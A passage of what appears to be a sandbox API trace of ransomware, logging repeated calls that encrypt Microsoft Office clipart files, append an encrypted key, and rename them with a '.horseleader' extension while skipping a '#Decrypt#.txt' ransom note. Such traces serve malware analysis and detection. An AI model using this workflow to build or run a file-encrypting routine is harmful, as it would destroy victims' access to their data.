(lpString1="BL00012_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.377] lstrcmpW (lpString1="BL00012_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.377] lstrlenW (lpString=".testttjffg") returned 11 [0253.377] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.377] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.377] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.377] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.378] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 67 [0253.378] StrStrW (lpFirst="BL00012_.WMF", lpSrch=".txt") returned 0x0 [0253.378] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9818) returned 1 [0253.379] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x265a, lpOverlapped=0x0) returned 1 [0253.380] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd9a6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.381] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x265a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x265a, lpOverlapped=0x0) returned 1 [0253.381] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.381] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.381] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.381] CloseHandle (hObject=0x158) returned 1 [0253.381] GetProcessHeap () returned 0x780000 [0253.381] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.381] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF.horseleader") returned 79 [0253.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf.horseleader")) returned 1 [0253.382] GetProcessHeap () returned 0x780000 [0253.383] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.383] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1c98800, ftCreationTime.dwHighDateTime=0x1bd4b2b, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe1c98800, ftLastWriteTime.dwHighDateTime=0x1bd4b2b, nFileSizeHigh=0x0, nFileSizeLow=0x1eb6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00045_.WMF", cAlternateFileName="")) returned 1 [0253.383] lstrcmpiW (lpString1="BL00045_.WMF", lpString2="Windows") returned -1 [0253.383] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 67 [0253.383] StrStrIW (lpFirst="BL00045_.WMF", lpSrch=".horseleader") returned 0x0 [0253.383] lstrcmpW (lpString1="BL00045_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.383] lstrcmpW (lpString1="BL00045_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.383] lstrlenW (lpString=".testttjffg") returned 11 [0253.383] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.383] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.383] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.383] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.384] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 67 [0253.384] StrStrW (lpFirst="BL00045_.WMF", lpSrch=".txt") returned 0x0 [0253.384] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7862) returned 1 [0253.384] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1eb6, lpOverlapped=0x0) returned 1 [0253.386] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe14a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.386] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1eb6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1eb6, lpOverlapped=0x0) returned 1 [0253.386] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.386] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.387] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.387] CloseHandle (hObject=0x158) returned 1 [0253.387] GetProcessHeap () returned 0x780000 [0253.387] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.387] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.horseleader") returned 79 [0253.387] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf.horseleader")) returned 1 [0253.388] GetProcessHeap () returned 0x780000 [0253.388] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.388] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a40fd00, ftCreationTime.dwHighDateTime=0x1bd4b27, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9a40fd00, ftLastWriteTime.dwHighDateTime=0x1bd4b27, nFileSizeHigh=0x0, nFileSizeLow=0x3f4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00098_.WMF", cAlternateFileName="")) returned 1 [0253.388] lstrcmpiW (lpString1="BL00098_.WMF", lpString2="Windows") returned -1 [0253.388] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 67 [0253.388] StrStrIW (lpFirst="BL00098_.WMF", lpSrch=".horseleader") returned 0x0 [0253.389] lstrcmpW (lpString1="BL00098_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.389] lstrcmpW (lpString1="BL00098_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.389] lstrlenW (lpString=".testttjffg") returned 11 [0253.389] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.389] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.389] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.389] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.390] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 67 [0253.390] StrStrW (lpFirst="BL00098_.WMF", lpSrch=".txt") returned 0x0 [0253.390] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1012) returned 1 [0253.390] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3f4, lpOverlapped=0x0) returned 1 [0253.391] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffc0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.391] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3f4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3f4, lpOverlapped=0x0) returned 1 [0253.392] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.392] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.392] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.392] CloseHandle (hObject=0x158) returned 1 [0253.392] GetProcessHeap () returned 0x780000 [0253.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.392] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.horseleader") returned 79 [0253.392] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf.horseleader")) returned 1 [0253.393] GetProcessHeap () returned 0x780000 [0253.393] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.393] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x888a3600, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x888a3600, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x370, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00105_.WMF", cAlternateFileName="")) returned 1 [0253.393] lstrcmpiW (lpString1="BL00105_.WMF", lpString2="Windows") returned -1 [0253.393] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 67 [0253.393] StrStrIW (lpFirst="BL00105_.WMF", lpSrch=".horseleader") returned 0x0 [0253.393] lstrcmpW (lpString1="BL00105_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.393] lstrcmpW (lpString1="BL00105_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.393] lstrlenW (lpString=".testttjffg") returned 11 [0253.393] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.393] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.393] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.393] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.395] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 67 [0253.395] StrStrW (lpFirst="BL00105_.WMF", lpSrch=".txt") returned 0x0 [0253.395] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=880) returned 1 [0253.395] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x370, lpOverlapped=0x0) returned 1 [0253.398] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffc90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.398] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x370, lpOverlapped=0x0) returned 1 [0253.398] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.398] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.398] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.398] CloseHandle (hObject=0x158) returned 1 [0253.398] GetProcessHeap () returned 0x780000 [0253.398] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.398] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.horseleader") returned 79 [0253.398] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf.horseleader")) returned 1 [0253.399] GetProcessHeap () returned 0x780000 [0253.399] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.399] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d0f5c00, ftCreationTime.dwHighDateTime=0x1bd4b24, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4d0f5c00, ftLastWriteTime.dwHighDateTime=0x1bd4b24, nFileSizeHigh=0x0, nFileSizeLow=0x27a2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00122_.WMF", cAlternateFileName="")) returned 1 [0253.399] lstrcmpiW (lpString1="BL00122_.WMF", lpString2="Windows") returned -1 [0253.399] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 67 [0253.399] StrStrIW (lpFirst="BL00122_.WMF", lpSrch=".horseleader") returned 0x0 [0253.399] lstrcmpW (lpString1="BL00122_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.399] lstrcmpW (lpString1="BL00122_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.399] lstrlenW (lpString=".testttjffg") returned 11 [0253.399] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.400] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.400] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.400] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.400] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 67 [0253.400] StrStrW (lpFirst="BL00122_.WMF", lpSrch=".txt") returned 0x0 [0253.400] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=10146) returned 1 [0253.400] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x27a2, lpOverlapped=0x0) returned 1 [0253.403] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd85e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.403] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x27a2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x27a2, lpOverlapped=0x0) returned 1 [0253.403] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.403] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.403] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.403] CloseHandle (hObject=0x158) returned 1 [0253.403] GetProcessHeap () returned 0x780000 [0253.403] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.404] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.horseleader") returned 79 [0253.404] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf.horseleader")) returned 1 [0253.405] GetProcessHeap () returned 0x780000 [0253.405] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.405] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39fc8c00, ftCreationTime.dwHighDateTime=0x1bd4b24, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x39fc8c00, ftLastWriteTime.dwHighDateTime=0x1bd4b24, nFileSizeHigh=0x0, nFileSizeLow=0x5b8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00130_.WMF", cAlternateFileName="")) returned 1 [0253.405] lstrcmpiW (lpString1="BL00130_.WMF", lpString2="Windows") returned -1 [0253.405] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 67 [0253.405] StrStrIW (lpFirst="BL00130_.WMF", lpSrch=".horseleader") returned 0x0 [0253.405] lstrcmpW (lpString1="BL00130_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.405] lstrcmpW (lpString1="BL00130_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.405] lstrlenW (lpString=".testttjffg") returned 11 [0253.405] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.405] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.405] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.405] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.406] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 67 [0253.406] StrStrW (lpFirst="BL00130_.WMF", lpSrch=".txt") returned 0x0 [0253.406] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1464) returned 1 [0253.406] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5b8, lpOverlapped=0x0) returned 1 [0253.408] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa48, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.408] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5b8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5b8, lpOverlapped=0x0) returned 1 [0253.408] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.408] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.408] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, 